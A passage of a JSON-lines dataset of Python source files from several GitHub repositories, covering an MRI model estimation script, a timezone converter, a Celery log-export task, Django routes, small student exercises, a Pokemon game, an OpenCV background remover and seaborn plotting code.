time: {np.round_(time.time() - t_, 3)} s\")\n\n np.save(f\"{output_path}/wmti_estimate.npy\", wmti) \n if not has_target:\n np.save(f\"{output_path}/input_dki.npy\", dki) \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--has_target\", default=False, type=bool)\n parser.add_argument(\"--dataset\", type=str) # #wmti_dki_validate_estimation.mat\n parser.add_argument(\"--dropout\", default=0., type=float)\n parser.add_argument(\"--logpath\", default=None)\n parser.add_argument(\"--logname\", default='lstm', type=str)\n\n parser.add_argument(\"--datapath\", type=str)\n parser.add_argument(\"--model_folder\", type=str)\n parser.add_argument(\"--output_dir\", default='estimation',type=str) \n parser.add_argument(\"--input_scale_type\", default=3, type=int)\n parser.add_argument(\"--dki_scaler_filename\", default=None, type=str)\n parser.add_argument(\"--output_scale_type\", default=2, type=int)\n parser.add_argument(\"--out_scale\", nargs=\"+\", default=[100], type=int)\n parser.add_argument(\"--out_intercept\", default=None)\n parser.add_argument(\"--data_normalizatioin\", default=True)\n\n parser.add_argument(\"--batch_size\", default=2048, type=int)\n parser.add_argument(\"--hidden_size\", default=96, type=int)\n parser.add_argument(\"--model_normalization\", default=True, type=bool)\n parser.add_argument(\"--input_seq_length\", default=6, type=int)\n parser.add_argument(\"--output_seq_length\", default=5, type=int)\n parser.add_argument(\"--load_checkpoint\", default=1000, type=int)\n\n args = parser.parse_args()\n main(args) 
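# hypothetical invocation: python wmti_estimate.py --datapath ./data --model_folder lstm_run --dataset wmti_dki_validate_estimation.mat\n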
\n","repo_name":"Mic-map/WMTI-Watson_DL","sub_path":"model/wmti_estimate.py","file_name":"wmti_estimate.py","file_ext":"py","file_size_in_byte":9052,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"15386873906","text":"from importlib import util\r\nfrom datetime import datetime, time, date\r\nfrom pytz import timezone\r\nfrom sys import exit\r\nimport time\r\nimport argparse\r\n\r\nparser = argparse.ArgumentParser()\r\nparser = argparse.ArgumentParser(description=\"Convert amongst UTC/IST/CET Timezones\")\r\nparser.add_argument(\"-z\", help=\"u|i|c Input time in UTC|IST|CET [Default: Current Zone]\", nargs='?')\r\nparser.add_argument(\"-t\", help=\"Input time in format \\\"\\\" (DoubleQuotes is must) [Default: Current Time]\", nargs='?')\r\nparser.add_argument(\"-d\", help=\"Input date in format \\\"\\\" (DoubleQuotes is must) [Default: Current Date]\", nargs='?')\r\nargs = parser.parse_args()\r\nd=args.d\r\nt=args.t\r\nch=args.z\r\n\r\ndef utc(t):\r\n tm=datetime.strptime(t,f)\r\n ist=timezone('UTC').localize(tm, is_dst=None).astimezone(timezone('Asia/Kolkata'))\r\n cet=timezone('UTC').localize(tm, is_dst=None).astimezone(timezone('Europe/Paris'))\r\n print(\"\\r\\tIST: {}\\tCET: {}\".format(ist.strftime(f),cet.strftime(f)), end=\"\")\r\n\r\ndef ist(t):\r\n tm=datetime.strptime(t,f)\r\n utc=timezone('Asia/Kolkata').localize(tm, is_dst=None).astimezone(timezone('UTC'))\r\n cet=timezone('Asia/Kolkata').localize(tm, is_dst=None).astimezone(timezone('Europe/Paris'))\r\n print(\"\\r\\tUTC: {}\\tCET: {}\".format(utc.strftime(f),cet.strftime(f)), end=\"\")\r\n\r\ndef cet(t):\r\n tm=datetime.strptime(t,f)\r\n utc=timezone('Europe/Paris').localize(tm, is_dst=None).astimezone(timezone('UTC'))\r\n ist=timezone('Europe/Paris').localize(tm, is_dst=None).astimezone(timezone('Asia/Kolkata'))\r\n print(\"\\r\\tUTC: {}\\tIST: {}\".format(utc.strftime(f),ist.strftime(f)), end=\"\")\r\n \r\nif d == None and t != None:\r\n d=date.today().strftime(\"%Y-%m-%d\")\r\n \r\nif ch == None:\r\n if -time.timezone == 19800:\r\n ch='i'\r\n elif -time.timezone == 7200:\r\n ch='c'\r\n else:\r\n ch='u'\r\n\r\nf = \"%Y-%m-%d %H:%M:%S\"\r\nt=d+' '+t\r\n \r\nif t == None:\r\n \r\n if ch == 'u':\r\n while True:\r\n t=datetime.now().strftime(f)\r\n utc(t)\r\n time.sleep(1)\r\n elif ch == 'c':\r\n while True:\r\n t=datetime.now().strftime(f)\r\n cet(t)\r\n time.sleep(1)\r\n elif ch == 'i':\r\n while True:\r\n t=datetime.now().strftime(f)\r\n ist(t)\r\n time.sleep(1)\r\n else:\r\n exit(\"Wrong Input, Input must be u|i|c\")\r\n\r\nelse:\r\n if ch == 'u':\r\n utc(t)\r\n elif ch == 'c':\r\n cet(t)\r\n elif ch == 'i':\r\n ist(t)\r\n else:\r\n exit(\"Wrong Input, Input must be u|i|c\")\r\n","repo_name":"1bl4z3r/boredhub","sub_path":"timezone.py","file_name":"timezone.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29583427022","text":"import os\nimport tarfile\nimport json\nimport datetime\nimport pytz\nimport arrow\n\nfrom django.utils.translation import gettext as _\nfrom django.utils import translation\nfrom celery.schedules import crontab\nfrom django.conf import settings\nfrom django.utils.crypto import get_random_string\nfrom django.utils import timezone\nfrom celery.task import task, periodic_task\n\nfrom apps.constants import RemoteStorageType\nfrom apps.log_search.constants import (\n ASYNC_DIR,\n FEATURE_ASYNC_EXPORT_COMMON,\n ASYNC_EXPORT_EMAIL_TEMPLATE,\n 
ASYNC_EXPORT_FILE_EXPIRED_DAYS,\n ASYNC_EXPORT_EXPIRED,\n ASYNC_APP_CODE,\n FEATURE_ASYNC_EXPORT_NOTIFY_TYPE,\n FEATURE_ASYNC_EXPORT_STORAGE_TYPE,\n MAX_RESULT_WINDOW,\n MsgModel,\n ASYNC_EXPORT_EMAIL_ERR_TEMPLATE,\n ExportStatus,\n)\nfrom apps.log_search.exceptions import PreCheckAsyncExportException\nfrom apps.log_search.handlers.search.search_handlers_esquery import SearchHandler\nfrom apps.log_search.models import Scenario, AsyncTask, LogIndexSet\nfrom apps.feature_toggle.handlers.toggle import FeatureToggleObject\nfrom apps.utils.log import logger\nfrom apps.utils.notify import NotifyType\nfrom apps.utils.remote_storage import StorageType\n\n\n@task(ignore_result=True, queue=\"async_export\")\ndef async_export(\n search_handler: SearchHandler,\n sorted_fields: list,\n async_task_id: int,\n url_path: str,\n search_url_path: str,\n language: str,\n):\n \"\"\"\n 异步导出任务\n @param search_handler {SearchHandler}\n @param sorted_fields {List}\n @param async_task_id {Int}\n @param url_path {Str}\n @param search_url_path {Str}\n @param language {Str}\n \"\"\"\n random_hash = get_random_string(length=10)\n time_now = arrow.now().format(\"YYYYMMDDHHmmss\")\n file_name = f\"{ASYNC_APP_CODE}_{search_handler.index_set_id}_{time_now}_{random_hash}\"\n tar_file_name = f\"{file_name}.tar.gz\"\n async_task = AsyncTask.objects.filter(id=async_task_id).first()\n async_export_util = AsyncExportUtils(\n search_handler=search_handler,\n sorted_fields=sorted_fields,\n file_name=file_name,\n tar_file_name=tar_file_name,\n )\n try:\n if not async_task:\n logger.error(f\"Can not find this: id: {async_task_id} record\")\n raise BaseException(f\"Can not find this: id: {async_task_id} record\")\n\n async_task.export_status = ExportStatus.DOWNLOAD_LOG\n try:\n async_export_util.export_package()\n except Exception as e: # pylint: disable=broad-except\n async_task = set_failed_status(async_task=async_task, reason=f\"export package error: {e}\")\n raise\n\n async_task.export_status = ExportStatus.EXPORT_PACKAGE\n async_task.file_name = tar_file_name\n async_task.file_size = async_export_util.get_file_size()\n try:\n async_export_util.export_upload()\n except Exception as e: # pylint: disable=broad-except\n async_task = set_failed_status(async_task=async_task, reason=f\"export upload error: {e}\")\n raise\n\n async_task.export_status = ExportStatus.EXPORT_UPLOAD\n try:\n url = async_export_util.generate_download_url(url_path=url_path)\n except Exception as e: # pylint: disable=broad-except\n async_task = set_failed_status(async_task=async_task, reason=f\"generate download url error: {e}\")\n raise\n\n async_task.download_url = url\n\n try:\n async_export_util.send_msg(\n index_set_id=search_handler.index_set_id,\n async_task=async_task,\n search_url_path=search_url_path,\n language=language,\n )\n except Exception as e: # pylint: disable=broad-except\n async_task = set_failed_status(async_task=async_task, reason=f\"send msg error: {e}\")\n raise\n\n except Exception as e: # pylint: disable=broad-except\n logger.exception(e)\n async_export_util.send_msg(\n index_set_id=search_handler.index_set_id,\n async_task=async_task,\n search_url_path=search_url_path,\n language=language,\n name=ASYNC_EXPORT_EMAIL_ERR_TEMPLATE,\n title_model=MsgModel.ABNORMAL,\n )\n return\n\n async_task.result = True\n async_task.export_status = ExportStatus.SUCCESS\n async_task.completed_at = timezone.now()\n async_task.save()\n\n async_export_util.clean_package()\n # 过$ASYNC_EXPORT_EXPIRED将对应状态置为ExportStatus.EXPIRED\n 
set_expired_status.apply_async(args=[async_task.id], countdown=ASYNC_EXPORT_EXPIRED)\n\n\ndef set_failed_status(async_task: AsyncTask, reason):\n async_task.failed_reason = reason\n async_task.export_status = ExportStatus.FAILED\n logger.error(async_task.failed_reason)\n async_task.save()\n return async_task\n\n\n@task(ignore_result=True)\ndef set_expired_status(async_task_id):\n async_task = AsyncTask.objects.get(id=async_task_id)\n async_task.export_status = ExportStatus.DOWNLOAD_EXPIRED\n async_task.save()\n\n\n@periodic_task(run_every=crontab(minute=\"10\", hour=\"3\"))\ndef clean_expired_status():\n \"\"\"\n change success status -> export_expired status\n \"\"\"\n\n AsyncTask.objects.filter(export_status=ExportStatus.SUCCESS).filter(\n completed_at__lt=arrow.now().shift(seconds=-ASYNC_EXPORT_EXPIRED).datetime\n ).update(export_status=ExportStatus.DOWNLOAD_EXPIRED)\n\n\n@periodic_task(run_every=crontab(minute=\"0\", hour=\"3\"))\ndef clean_expired_task():\n \"\"\"\n clean expired task file\n expired_time: 2days\n\n \"\"\"\n day_ago = datetime.datetime.now(pytz.timezone(\"UTC\")) - datetime.timedelta(days=ASYNC_EXPORT_FILE_EXPIRED_DAYS)\n # 获取过期的内网下载文件\n expired_task_list = AsyncTask.objects.filter(created_at__lt=day_ago, is_clean=False)\n # nfs文件需要进行定期清理操作\n storage_type = FeatureToggleObject.toggle(FEATURE_ASYNC_EXPORT_COMMON).feature_config.get(\n FEATURE_ASYNC_EXPORT_STORAGE_TYPE\n )\n\n if storage_type or storage_type == RemoteStorageType.NFS.value:\n # 删除NFS文件\n for expired_task in expired_task_list:\n target_file_dir = os.path.join(settings.EXTRACT_SAAS_STORE_DIR, expired_task.file_name)\n if os.path.isfile(target_file_dir):\n os.remove(os.path.abspath(target_file_dir))\n expired_task.is_clean = True\n expired_task.save()\n\n\nclass AsyncExportUtils(object):\n \"\"\"\n async export utils(export_package, export_upload, generate_download_url, send_msg, clean_package)\n \"\"\"\n\n def __init__(self, search_handler: SearchHandler, sorted_fields: list, file_name: str, tar_file_name: str):\n \"\"\"\n @param search_handler: the handler cls to search\n @param sorted_fields: the fields to sort search result\n @param file_name: the export file name\n @param tar_file_name: the file name which will be tar\n \"\"\"\n self.search_handler = search_handler\n self.sorted_fields = sorted_fields\n self.file_name = file_name\n self.tar_file_name = tar_file_name\n self.file_path = f\"{ASYNC_DIR}/{self.file_name}\"\n self.tar_file_path = f\"{ASYNC_DIR}/{self.tar_file_name}\"\n self.storage = self.init_remote_storage()\n self.notify = self.init_notify_type()\n\n def export_package(self):\n \"\"\"\n 检索结果文件打包\n \"\"\"\n if not (os.path.exists(ASYNC_DIR) and os.path.isdir(ASYNC_DIR)):\n os.makedirs(ASYNC_DIR)\n\n result = self.search_handler.pre_get_result(sorted_fields=self.sorted_fields, size=MAX_RESULT_WINDOW)\n # 判断是否成功\n if result[\"_shards\"][\"total\"] != result[\"_shards\"][\"successful\"]:\n logger.error(\"can not create async_export task, reason: {}\".format(result[\"_shards\"][\"failures\"]))\n raise PreCheckAsyncExportException()\n with open(self.file_path, \"a+\", encoding=\"utf-8\") as f:\n result_list = self.search_handler._deal_query_result(result_dict=result).get(\"origin_log_list\")\n for item in result_list:\n f.write(\"%s\\n\" % json.dumps(item, ensure_ascii=False))\n if self.search_handler.scenario_id == Scenario.ES:\n generate_result = self.search_handler.scroll_result(result)\n else:\n generate_result = self.search_handler.search_after_result(result, self.sorted_fields)\n 
self.write_file(f, generate_result)\n\n with tarfile.open(self.tar_file_path, \"w:gz\") as tar:\n tar.add(self.file_path, arcname=self.file_name)\n\n def export_upload(self):\n \"\"\"\n 文件上传\n \"\"\"\n self.storage.export_upload(file_path=self.tar_file_path, file_name=self.tar_file_name)\n\n def generate_download_url(self, url_path: str):\n \"\"\"\n 生成url\n \"\"\"\n return self.storage.generate_download_url(url_path=url_path, file_name=self.tar_file_name)\n\n def send_msg(\n self,\n index_set_id: int,\n async_task: AsyncTask,\n search_url_path: str,\n language: str,\n name: str = ASYNC_EXPORT_EMAIL_TEMPLATE,\n title_model: str = MsgModel.NORMAL,\n ):\n \"\"\"\n 发送邮件\n \"\"\"\n index_set_obj = LogIndexSet.objects.get(index_set_id=index_set_id)\n\n platform = settings.EMAIL_TITLE[\"en\"] if translation.get_language() == \"en\" else settings.EMAIL_TITLE[\"zh\"]\n\n title = self.notify.title(\n self.generate_title_template(title_model=title_model),\n platform=platform,\n index_set_name=index_set_obj.index_set_name,\n )\n\n content = self.notify.content(\n name=name,\n file={\n \"platform\": platform,\n \"created_at\": arrow.now().format(\"YYYY-MM-DD HH:mm:ss\"),\n \"index_set_name\": index_set_obj.index_set_name,\n \"index\": \",\".join([index[\"result_table_id\"].replace(\".\", \"_\") for index in index_set_obj.indexes]),\n \"create_by\": async_task.created_by,\n \"size\": async_task.file_size,\n \"request_param\": json.dumps(async_task.request_param),\n \"search_url\": search_url_path,\n \"download_url\": async_task.download_url,\n },\n language=language,\n )\n self.notify.send(receivers=async_task.created_by, title=title, content=content)\n\n @classmethod\n def generate_title_template(cls, title_model):\n title_template_map = {\n MsgModel.NORMAL: _(\"【{platform}】{index_set_name} 检索导出\"),\n MsgModel.ABNORMAL: _(\"【{platform}】{index_set_name} 检索导出失败\"),\n }\n return title_template_map.get(title_model, title_template_map.get(MsgModel.NORMAL))\n\n def clean_package(self):\n \"\"\"\n 清空产生的临时文件\n \"\"\"\n os.remove(self.file_path)\n os.remove(self.tar_file_path)\n\n @classmethod\n def init_remote_storage(cls):\n toggle = FeatureToggleObject.toggle(FEATURE_ASYNC_EXPORT_COMMON).feature_config\n storage_type = toggle.get(FEATURE_ASYNC_EXPORT_STORAGE_TYPE)\n storage = StorageType.get_instance(storage_type)\n if not storage_type or storage_type == RemoteStorageType.NFS.value:\n return storage(settings.EXTRACT_SAAS_STORE_DIR)\n if storage_type == RemoteStorageType.BKREPO.value:\n return storage(expired=ASYNC_EXPORT_EXPIRED)\n return storage(\n toggle.get(\"qcloud_secret_id\"),\n toggle.get(\"qcloud_secret_key\"),\n toggle.get(\"qcloud_cos_region\"),\n toggle.get(\"qcloud_cos_bucket\"),\n ASYNC_EXPORT_EXPIRED,\n )\n\n def get_file_size(self):\n \"\"\"\n 获取文件大小 单位:m,保留小数2位\n \"\"\"\n return round(os.path.getsize(self.tar_file_path) / float(1024 * 1024), 2)\n\n @classmethod\n def init_notify_type(cls):\n notify_type = FeatureToggleObject.toggle(FEATURE_ASYNC_EXPORT_COMMON).feature_config.get(\n FEATURE_ASYNC_EXPORT_NOTIFY_TYPE\n )\n\n return NotifyType.get_instance(notify_type=notify_type)()\n\n @classmethod\n def write_file(cls, f, result):\n \"\"\"\n 将对应数据写到文件中\n \"\"\"\n for res in result:\n origin_result_list = res.get(\"origin_log_list\")\n for item in origin_result_list:\n f.write(\"%s\\n\" % 
json.dumps(item))\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/log_search/tasks/async_export.py","file_name":"async_export.py","file_ext":"py","file_size_in_byte":12511,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"} +{"seq_id":"10034086058","text":"from django.urls import path\n\nfrom . import views\n\napp_name = \"home\"\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"subcommittees/\", views.subcommittees, name=\"subcommittees\"),\n path(\"events/\", views.events, name=\"events\"),\n path(\"about/\", views.about, name=\"about\"),\n path(\"jet-engine-proposal/\", views.proposal, name=\"proposal\"),\n]\n","repo_name":"npinkhasov/wpi-aiaa-site","sub_path":"wpiaiaasite/home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19381421733","text":"def min_or_max_index(lst, find_min):\n \"\"\"(list of numbers, bool) -> tuple of (number, int)\n Return the index of the minimum or maximum and the minimum or maximum.\n Preconditions: len(lst) >= 1\n \"\"\"\n if find_min:\n return get_min(lst)\n else:\n return get_max(lst)\ndef get_max(lst):\n \"\"\"(list of numbers) -> (number,index)\n Return maximum value in list and its index\n Preconditions: len(lst) >= 1\n \"\"\"\n maximum = lst[0]\n index = 0\n for i in range(len(lst)):\n if lst[i] > maximum:\n maximum = lst[i]\n index = i\n return (maximum, index)\n\ndef get_min(lst):\n \"\"\"(list of numbers) -> (number,index)\n Return minimum value in list and its index\n Preconditions: len(lst) >= 1\n \"\"\"\n minimum = lst[0]\n index = 0\n for i in range(len(lst)):\n if lst[i] < minimum:\n minimum = lst[i]\n index = i\n return (minimum, index)\n","repo_name":"SahilTara/ITI1120","sub_path":"LABS/lab9-students/prog-ex02.py","file_name":"prog-ex02.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24936624081","text":"from openpyxl import Workbook\nwb=Workbook()\nws=wb.active\nws['A1']=42\nws.append([1,2,3,4,5,6,7,8,9,10])\nimport datetime\nws['C1']=datetime.datetime.now()\nws1=wb.create_sheet(0)\nws.title=\"sai\"\nws1.sheet_properties.tabColor=\"1072BA\"\nws is wb\nfor sheet in wb:\n print(sheet.title)\nfor i in range(1,10):\n for j in range (1,101):\n wb.save(\"test.xlsx\")\n","repo_name":"sai231/python","sub_path":"samplegit.py","file_name":"samplegit.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35076312807","text":"\"\"\"\nPokemonBattleSimulator.py\n\nPlay Pokemon in Python! You can choose wether to play with Pikachu or Charmander, and your opponent will always be the other Pokemon. 
Now with FIRE-WATER-GRASS type pokemon and type effectivity bonuses!\n\"\"\"\nimport random\n\n#Pokemon Object Constructor\nclass Pokemon(object):\n\tdef __init__(self, name, element, health, move1, move2, move3, move4):\n\t\tself.name = name\n\t\tself.element = element\n\t\tself.health = health\n\t\tself.move1 = move1\n\t\tself.move2 = move2\n\t\tself.move3 = move3\n\t\tself.move4 = move4\n\tdef __repr__(self):\n\t\treturn \"I am a Pokemon\"\n\n#Pokemon Move Function fire-water-grass effectivity\ndef Attack(yourDamage, opponentDamage):\n\tif yourPick.element == 'water' and opponentPick.element == 'fire':\n\t\tyourTypeBonus = 2.0\n\t\topponentTypeBonus = 0.5\n\telif yourPick.element == 'fire' and opponentPick.element == 'water':\n\t\tyourTypeBonus = 0.5\n\t\topponentTypeBonus = 2.0\n\telif yourPick.element == 'grass' and opponentPick.element == 'fire':\n\t\tyourTypeBonus = 0.5\n\t\topponentTypeBonus = 2.0\n\telif yourPick.element == 'fire' and opponentPick.element == 'grass':\n\t\tyourTypeBonus = 2.0\n\t\topponentTypeBonus = 0.5\n\telif yourPick.element == 'water' and opponentPick.element == 'grass':\n\t\tyourTypeBonus = 0.5\n\t\topponentTypeBonus = 2.0\n\telif yourPick.element == 'grass' and opponentPick.element == 'water':\n\t\tyourTypeBonus = 2.0\n\t\topponentTypeBonus = 0.5\n\tyourPick.health -= yourDamage * opponentTypeBonus\n\topponentPick.health -= opponentDamage * yourTypeBonus\n\n#Creation of Pokemon\nSquirtle = Pokemon(\"Squirtle\", \"water\", 120, \"Water Gun\", \"Hydro Cannon\", \"Skull Bash\", \"Aqua Jet\")\nCharmander = Pokemon(\"Charmander\", \"fire\", 120, \"Flamethrower\", \"Skull Bash\", \"Tackle\", \"Heat Crash\")\nBulbasaur = Pokemon(\"Bulbasaur\", \"grass\", 120, \"Vine Whip\", \"Grass Knot\", \"Tackle\", \"Energy Ball\")\nPoke = [Squirtle, Charmander, Bulbasaur] #List of all Pokemon mentioned here\n\n#Explanation of Pokemon\nfor Pokemon in Poke:\n\tprint(Pokemon.name, \"is of type\", Pokemon.element + \".\", \"It has\", str(Pokemon.health) + \" health.\", \"It knows\", Pokemon.move1, \",\", Pokemon.move2, \",\", Pokemon.move3, \",and\", Pokemon.move4 + \".\", \"\\n\")\n\n#Asking User Input for which Pokemon they want to battle with\nyourSelection = int(input(\"Which Pokemon would you like to play with? Pick the corresponding number for that Pokemon\"))\nopponentSelection = random.random()\n\n#Setting a Pokemon to user\nif yourSelection == 1:\n yourPick = Poke[0] #NOTE: yourPick inherits methods of the other Poké\n if opponentSelection >= 0.5:\n \topponentPick = Poke[1]\n else:\n \topponentPick = Poke[2]\n print(\"You have picked to play with\", yourPick.name)\nelif yourSelection == 2:\n yourPick = Poke[1]\n if opponentSelection >= 0.5:\n \topponentPick = Poke[2]\n else:\n \topponentPick = Poke[0]\n print(\"You have picked to play with\", yourPick.name)\nelif yourSelection == 3:\n\tyourPick = Poke[2]\n\tif opponentSelection >= 0.5:\n\t\topponentPick = Poke[0]\n\telse:\n\t\topponentPick = Poke[1]\n\tprint(\"You have picked to play with\", yourPick.name)\nelse:\n\tprint(\"That is not a Pokemon. 
Try again\")\nprint(\"Your opponent is\", opponentPick.name, \"\\n\")\n\n#Game Loop\nwhile(yourPick.health >= 0 and opponentPick.health >= 0):\n print(yourPick.name, \"has\", yourPick.health, \"health left.\", opponentPick.name, \"has\", opponentPick.health, \"health left.\")\n print(yourPick.name, \"knows:\\n\", yourPick.move1, \"\\n\", yourPick.move2, \"\\n\", yourPick.move3, \"\\n\", yourPick.move4)\n yourMove = int(input(\"Type the number of the move you would like to use corresponding to the name as it appeared above. Pick '5' to switch out to a different pokemon.\\n\"))\n if(yourMove == 1):\n Attack(0, 20)\n print(yourPick.name, \"used\", yourPick.move1, \"\\n\")\n elif(yourMove == 2):\n Attack(0, 22)\n print(yourPick.name, \"used\", yourPick.move2, \"\\n\")\n elif(yourMove == 3):\n Attack(10, 30)\n print(yourPick.name, \"used\", yourPick.move3, \"\\n\")\n elif(yourMove == 4):\n Attack(4, 25)\n print(yourPick.name, \"used\", yourPick.move4, \"\\n\")\n elif(yourMove == 5):\n for Pokemon in Poke:\n print(Pokemon.name, \"is of type\", Pokemon.element + \".\", \"It has\", str(Pokemon.health) + \" health.\", \"It knows\", Pokemon.move1, \",\", Pokemon.move2, \",\", Pokemon.move3, \",and\", Pokemon.move4 + \".\", \"\\n\")\n x = int(input(\"Which pokemon would you like to play with? Pick the corressponding number:\"))\n yourPick = Poke[x - 1]\n else:\n print(\"That is not a move, try again.\")\n \n opponentMove = random.randint(1,4)\n\n if (opponentMove == 1):\n Attack(20, 0)\n print(opponentPick.name, \"used\", opponentPick.move1, \"\\n\")\n elif(opponentMove == 2):\n Attack(22, 0)\n print(opponentPick.name, \"used\", opponentPick.move2, \"\\n\")\n elif(opponentMove == 3):\n Attack(30, 10)\n print(opponentPick.name, \"used\", opponentPick.move3, \"\\n\")\n elif(opponentMove == 4):\n Attack(25, 4)\n print(opponentPick.name, \"used\", opponentPick.move4, \"\\n\")\n else:\n print(\"That is not a move\")\nif yourPick.health >= 0 and opponentPick.health <= 0:\n print(yourPick.name, \"won!\", yourPick.name, \"has\", yourPick.health, \"health points left.\")\n print(opponentPick.name, \"fainted.\")\nelse:\n print(\"Sorry, better luck next time!\", opponentPick.name, \"has\", opponentPick.health, \"health points left.\")\n print(yourPick.name, \"fainted.\")","repo_name":"wagnerfilho1995/PokemonBattleSimulator","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":5405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4654712759","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 26 21:58:38 2017\n\n@author: Friend\n\"\"\"\n\"\"\"\nПрограмма, вычисляющая ��вадрат числа.\nМожет выдавать сообщение с результатом \nразными способами по выбору.\nСообщение зависит не от ключа-цифры, а от\nколичества указаний опционального аргумента\n\"\"\"\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"square\", \n type=int,\n help=\"display a square of a given number\")\nparser.add_argument(\"-v\", \"--verbosity\",\n #Работа программы определяется количеством указаний\n #данного опционального аргумента\n action=\"count\", \n #Значение по умолчанию, будет присваиваться переменной\n #verbosity, если его явно не указать при вызове\n default=0,\n help=\"increase output verbosity\")\nargs = parser.parse_args()\nanswer = args.square**2\nif args.verbosity >= 2:\n print(\"the square of {} equals {}\".format(args.square, answer))\nelif args.verbosity >= 1:\n print(\"{}^2 = {}\".format(args.square, 
answer))\nelse:\n    print(answer)\n    \n\"\"\"\nFor a demonstration, run:\npython Sqcount.py 9 -v\npython Sqcount.py 9 -vv\npython Sqcount.py 9 -vvv\npython Sqcount.py 9 - without default=0 this would raise an error, since\n                     the comparison operation cannot be applied to a None\n                     value of type NoneType\n\"\"\"","repo_name":"hombit/scientific_python","sub_path":"misc/jupyter_notebooks/17.12.01/Sqcount.py","file_name":"Sqcount.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"ru","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"2801692766","text":"#palindrome \r\n\r\ndef ispalindrome(w):\r\n\r\n    rev = ''.join(reversed(w))\r\n\r\n    \r\n    if(w == rev):\r\n        return True\r\n    return False\r\n\r\n# main function\r\nword=input(\"Enter the word \")\r\ncheck = ispalindrome(word)\r\n\r\nif (check):\r\n    print(\"Yes\")\r\nelse:\r\n    print(\"No\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Ahmedhesham2232/assignment1Eth-hack","sub_path":"assignment1Eth-hack/Q3 n1.py","file_name":"Q3 n1.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39194377281","text":"import cv2\r\n#import cvzone\r\nfrom cvzone.SelfiSegmentationModule import SelfiSegmentation \r\n\r\n\r\ncap = cv2.VideoCapture(0)\r\ncap.set(3,648)\r\ncap.set(4,488)\r\n\r\nsegmentor = SelfiSegmentation()\r\n\r\nwhile True:\r\n    success, img = cap.read()\r\n    \r\n    img_out = segmentor.removeBG(img,(125,0,125),threshold=0.8)\r\n    \r\n    cv2.imshow(\"image\",img)\r\n    cv2.imshow(\"img_out\",img_out)\r\n    if cv2.waitKey(1) == ord('q'):\r\n        break\r\ncap.release() \r\ncv2.destroyAllWindows()\r\n    \r\n","repo_name":"DileepChakravarthy7/Background_removal","sub_path":"background_remover.py","file_name":"background_remover.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3799822647","text":"import matplotlib.pyplot as plot\r\nimport seaborn as sns\r\nimport pandas\r\n\r\ncustomerData = pandas.read_csv(\"TechElectro_Customer_Data.csv\")\r\n\r\n# Plotting a histogram of Age distribution\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.histplot(customerData['Age'], bins = 20)\r\n\r\nplot.xlabel('Age')\r\nplot.ylabel('Frequency')\r\nplot.title('Histogram of Age Distribution')\r\n\r\nplot.show()\r\n\r\n# Plotting a boxplot of Annual Income by Gender\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.boxplot(x = 'Gender', y = 'Annual Income', data = customerData)\r\n\r\nplot.xlabel('Gender')\r\nplot.ylabel('Annual Income')\r\nplot.title('Box Plot of Annual Income by Gender')\r\n\r\nplot.show()\r\n\r\n# Plotting a countplot of Marital Status\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.countplot(x = 'Marital Status', data = customerData)\r\n\r\nplot.xlabel('Marital Status')\r\nplot.ylabel('Count')\r\nplot.title('Count Plot of Marital Status Distribution')\r\n\r\nplot.show()\r\n\r\n# Plotting a scatter plot of Age & Total Purchases with hue showing the gender associated with each point\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.scatterplot(x = 'Age', y = 'Total Purchases', data = customerData, hue = 'Gender')\r\n\r\nplot.xlabel('Age')\r\nplot.ylabel('Total Purchases')\r\nplot.title('Scatter Plot of Age & Total Purchases w/ Hue of Gender')\r\nplot.show()\r\n\r\n# Plotting a bar plot of Preferred Category distribution\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.countplot(x = 'Preferred Category', data = 
customerData)\r\n\r\nplot.xlabel('Preferred Category')\r\nplot.ylabel('Count')\r\nplot.title('Bar Plot of Preferred Category Distribution')\r\n\r\nplot.show()\r\n\r\n# Plotting a pairplot to visualize relationships between numerical variables\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.pairplot(customerData[['Age', 'Annual Income', 'Total Purchases']], diag_kind='kde')\r\nplot.suptitle(\"Pair Plot between Age, Annual Income & Total Purchases\", y = 1.05)\r\n\r\nplot.show()\r\n\r\n# Plotting a correlation heatmap of numerical variables\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.heatmap(customerData[['Age', 'Annual Income', 'Total Purchases']].corr(), annot = True, cmap = 'coolwarm')\r\n\r\nplot.title('Correlation Heatmap of Age, Annual Income & Total Purchases')\r\n\r\nplot.show()\r\n\r\n# Plotting a box plot of Marital Status and Annual Income w/ Hue showing the gender associated with it\r\nplot.figure(figsize = (10, 6))\r\n\r\nsns.boxplot(x = 